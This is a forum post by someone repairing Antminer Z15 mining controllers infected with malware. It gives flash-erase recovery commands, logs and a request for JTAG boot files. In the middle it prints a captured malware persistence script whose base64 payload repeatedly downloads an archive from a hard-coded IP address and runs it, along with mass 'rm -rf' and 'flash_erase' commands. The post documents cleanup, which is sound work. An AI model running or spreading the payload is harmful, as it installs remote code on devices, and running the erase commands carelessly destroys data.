Z15 controller virus wipe the whole Nand flash completely 2 out 15 cards wiped
I was able to get 13 of 15 fixed (various versions of virus) with modified firmware i wrote, but 2 were blank when i started. their patches must of been bad on z15 firmware and its totally blank for 0x0-, no fsbl, no u-boot, no kernel, no backups. so controller is completely dead.
I need the specific jtag file to initialize the Nand for flashing from jtag your "zynq 7007" setting
I've tested with jtag and unable to flash Nand from jtag because of known bug.
I'm currently working on this version of Xilinx fix but may take days to figure.
Does the z15 controller have a unlisted jumper to boot into "jtag Boot Mode" or points i can solder jump to enable "jtag Boot Mode"
all other controllers were fixed with modified BITMAIN recovery using multiple erase and wipe techniques and scripts in SD card boot firmware. it was very difficult to get the files wiped from /config directory: .shadow, .shkey, .shrm
random: dd urandom read with 2 bits of entropy available
format /config
Erasing 128 Kibyte @ 0 -- 0 % complete
Erasing 128 Kibyte @ 0 -- 0 % complete
jffs2: Empty flash at 0x00188c40 ends at 0x00189000
jffs2: Empty flash at 0x0018cab8 ends at 0x0018d000
jffs2: Empty flash at 0x00190afc ends at 0x00191000
jffs2: Empty flash at 0x00192b00 ends at 0x00193000
jffs2: Empty flash at 0x00194aa8 ends at 0x00195000
rm: can't remove '/config/*': No such file or directory
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x0026aaec: read 0x4a9de46c, calculated 0x155bd5c7.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x00268e58: read 0x4a9de46c, calculated 0xdc2a345d.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x00221aec: read 0x4a9de46c, calculated 0x155bd5c7.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x001ecaec: read 0x4a9de46c, calculated 0x155bd5c7.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x001eaaec: read 0x4a9de46c, calculated 0x155bd5c7.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x001e8eb4: read 0x4a9de46c, calculated 0xa7334dbc.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x00191adc: read 0x4719db6a, calculated 0x697b1838.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x0018fadc: read 0xabe73f95, calculated 0x62008b97.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x00193adc: read 0xa01f9fbc, calculated 0x62d6c2c0.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x0018baec: read 0xa01f9fbc, calculated 0x6e30ea7.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x000d0ae0: read 0x9e1d6c9e, calculated 0xa66bcfcb.
jffs2: notice: (693) check_node_data: wrong data CRC in data node at 0x000ceae0: read 0xd7fe9bae, calculated 0x6d4a122.
drwxr-xr-x 3 root root 0 Jan 1 00:00 .
drwxr-xr-x 20 1000 1000 1024 May 21 2022 ..
-rwxr-xr-x 1 root root 2199708 Apr 5 2022 .shadow
-rw-r--r-- 1 root root 2 May 13 2022 .shkey
-rw-r--r-- 1 root root 2 May 13 2022 .shrm
rm: can't remove '/config/*': No such file or directory
Erasing 128 Kibyte @ 0 -- 0 % complete
Erasing 128 Kibyte @ 0 -- 0 % complete
Starting syslogd/klogd: done
killall: udhcpc: no process killed```
you need to add to your recoveries the following commands and include all necessary flash binarys in the root of sd card to ensure its available. some had deleted the commands and didnt run and wipe until i added the binaries. your "rm" command doesn't delete various version they use for names with "dots (.)"
ls -la /config
chmod +rwx /config/*.*
chmod +rwx /config/*
chmod +rwx /config/.*
chmod +rwx /config/*.
chmod 666 /config/*.*
chmod 666 /config/*
chmod 666 /config/.*
chmod 666 /config/*.
chmod -x /config/*.*
chmod -x /config/*
chmod -x /config/.*
chmod -x /config/*
chmod 0 /config/*.*
chmod 0 /config/*
chmod 0 /config/.*
chmod 0 /config/*
ls -la /config
rm -rf /config/*.*
rm -rf /config/*
rm -rf /config/.*
rm -rf /config/*
rm -rf /config/*.
./flash_erase -j -N /dev/mtd2 0x0 0 >>erase.log
./flash_erase /dev/mtd3 0x0 0 >>erase.log
./flash_erase /dev/mtd4 0x0 0 >>erase.log
flash_erase -j -N /dev/mtd2 0x0 0 >>erase.log
flash_erase /dev/mtd3 0x0 0 >>erase.log
flash_erase /dev/mtd4 0x0 0 >>erase.log
below you can see the jffs2 partition is all screw up. they copy the files prior to boot back in.
root@antMiner:/config# ll
drwxr-xr-x 3 root root 0 Jan 1 00:00 .
drwxr-xr-x 19 root root 1.0K Jan 1 00:00 ..
-rwxr-xr-x 1 root root 1.8M Apr 5 2022 .shadow
-rw------- 1 root root 362 Jan 1 00:00 cgminer.conf
-rw-r--r-- 1 root root 11 Jan 1 00:00 dropbear
-rwx------ 1 root root 61 Jan 1 00:00 lighttpd-htdigest.user
-rw-r--r-- 1 root root 18 Jan 1 00:00 mac
-rw-r--r-- 1 root root 300 Jan 1 00:08 mv4.conf
-rw------- 1 root root 1.4K Jan 1 00:08 network.conf
-r-------- 1 root root 634 Mar 18 2020 shadow
-r-------- 1 root root 11 Jan 1 00:00 user_setting
-base64 decoded
rm -rf "$0"
if [ -f /tmp/phenix.pid ]; then
pid=$(cat /tmp/phenix.pid)
if ps|awk '{print $1}'|grep -e "^$pid$"; then
exit 0
nohup sh /config/store/rebirth.sh > /dev/null 2>&1 &
echo "IyEvYmluL3NoCnJtIC1yZiAiJDAiCgppZiBbIC1mIC90bXAvcGhlbml4LnBpZCBdOyB0aGVuCiAgICBwaWQ9JChjYXQgL3RtcC9waGVuaXgucGlkKQogICAgaWYgcHN8YXdrICd7cHJpbnQgJDF9J3xncmVwIC1lICJeJHBpZCQiOyB0aGVuCiAgICAgICAgZXhpdCAwCiAgICBmaQpmaQoKZWNobyAkJCAL3RtcC9waGVuaXgucGlkCgppZiBbIC1mIC91c3IvYmluL250ZGQgXTsgdGhlbiAKICBleGl0IDA7IApmaQoKcm0gLXJmIC90bXAvbGF0ZXN0Cm1rZGlyIC90bXAvbGF0ZXN0CmNkIC90bXAvbGF0ZXN0Cgp3aGlsZSB0cnVlOyBkbwogIHNsZWVwIDEwCiAgZWNobyAnd2dldC4uLicKICB3Z2V0IC1xTy0gaHR0cDovLzEzOS4xOTguMTg2LjIwMC9tZC50YXIuZ3ogfCB0YXIgeHoKICBlY2hvICJ3Z2V0OiAkPyIKICBpZiBbICQ/IC1lcSAwIF07IHRoZW4KICAgIHNoIHJ1bm1lLnNoCiAgICBjZCAvdG1wLwogICAgcm0gLXJmIC90bXAvbGF0ZXN0CiAgICBleGl0IDAKICBmaQpkb25l" | base64 -d > /tmp/phenix; chmod +x /tmp/phenix; nohup /tmp/phenix >/dev/null 2>&1 &
if [ ! -f /config/mv4.conf ]; then echo '11W2cbY2zdGFZNumAf/KScHqeJi+/9mjQGaeG2sR0y3nmSdJ0pMjmNnGT4+A7EZG2XvULVDR6gAl5SEHtL59Syjnd2YcyPqrIRZxG1sVd+n0G2bWd0bEAiAv3o+O9jvrEvCORxoZlW1bAQXo+sT4M1obCpz/VaALWbo3I0xrDqfprf66m4qNOpB0401pvNvD0bDHWJ458/jElhmpQrCuI+KO/AYTRKQRug9850DW+4pSfwBKEkePQ2P/TxdJIDqguQNC2RUydDwTbVPN08Ka0tV21SYG1FhWs282Ab4/Cv0=' > /config/mv4.conf; fi
--- SD recover NAND begin ---
jffs2: Empty flash at 0x00188c40 ends at 0x00189000
jffs2: Empty flash at 0x0018cab8 ends at 0x0018d000
jffs2: Empty flash at 0x00190afc ends at 0x00191000
jffs2: Empty flash at 0x00192b00 ends at 0x00193000
jffs2: Empty flash at 0x00194aa8 ends at 0x00195000
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x0026aaec: read 0x4a9de46c, calculated 0x155bd5c7.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x00268e58: read 0x4a9de46c, calculated 0xdc2a345d.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x00221aec: read 0x4a9de46c, calculated 0x155bd5c7.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x001ecaec: read 0x4a9de46c, calculated 0x155bd5c7.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x001eaaec: read 0x4a9de46c, calculated 0x155bd5c7.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x001e8eb4: read 0x4a9de46c, calculated 0xa7334dbc.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x00191adc: read 0x4719db6a, calculated 0x697b1838.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x0018fadc: read 0xabe73f95, calculated 0x62008b97.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x00193adc: read 0xa01f9fbc, calculated 0x62d6c2c0.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x0018baec: read 0xa01f9fbc, calculated 0x6e30ea7.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x000d0ae0: read 0x9e1d6c9e, calculated 0xa66bcfcb.
jffs2: notice: (928) check_node_data: wrong data CRC in data node at 0x000ceae0: read 0xd7fe9bae, calculated 0x6d4a122.
drwxr-xr-x 3 root root 0 Jan 1 00:00 .
drwxr-xr-x 19 1000 1000 1024 Jan 1 00:00 ..
-rwxr-xr-x 1 root root 2199708 Apr 5 2022 .shadow
-rw-r--r-- 1 root root 2 May 13 2022 .shkey
-rw-r--r-- 1 root root 2 May 13 2022 .shrm
-rw-r--r-- 1 root root 0 Jan 1 00:00 .test_file_for_virus
-rw-r--r-- 1 root root 0 Jan 1 00:00 .test_file_for_virus.
-rw-r--r-- 1 root root 0 Jan 1 00:00 .test_file_for_virus.shadow_fake
-rw-r--r-- 1 root root 0 Jan 1 00:00 test_file_for_virus.
-rw-r--r-- 1 root root 0 Jan 1 00:00 test_file_for_virus.shadow_fake
d--------- 3 root root 0 Jan 1 00:00 .
d--------- 19 1000 1000 1024 Jan 1 00:00 ..
---------- 1 root root 2199708 Apr 5 2022 .shadow
---------- 1 root root 2 May 13 2022 .shkey
---------- 1 root root 2 May 13 2022 .shrm
---------- 1 root root 0 Jan 1 00:00 .test_file_for_virus
---------- 1 root root 0 Jan 1 00:00 .test_file_for_virus.
---------- 1 root root 0 Jan 1 00:00 .test_file_for_virus.shadow_fake
---------- 1 root root 0 Jan 1 00:00 test_file_for_virus.
---------- 1 root root 0 Jan 1 00:00 test_file_for_virus.shadow_fake
rm: can't remove '.' or '..'
rm: can't remove '.' or '..'
--- config directory listing holding virus ---
------------ mv4, .shkey, .shrm or similar file ------------
d--------- 3 root root 0 Jan 1 00:00 .
d--------- 19 1000 1000 1024 Jan 1 00:00 ..
========= Check Log File on SD-Card =========
cat errors ok
cat: write error: No space left on device
Flashing SD card instruction for Z15
Flashing SD card documents:
https://file12.bitmain.com/shop-product/firmware/62272a1a-a471-4027-98b2-509b6584994e/2020/10/12/16/Z15%20SD%20card%20recovery%20image.zip -
Thanks for the links.
Problem with these last 2 boards is that they don't have a boot loader left in them. ill need to flash from jtag. Those are the files i need. or at least u-boot.elf and fsbl.elf to get them start back up and load Antminer firmware on them.
They don't recognize SD card or boot at all. Flash boot loader is gone. they respond to jtag, but is there a jumper to to boot from jtag so i can re-program them? Nand boot doesn't allow jtag programming.
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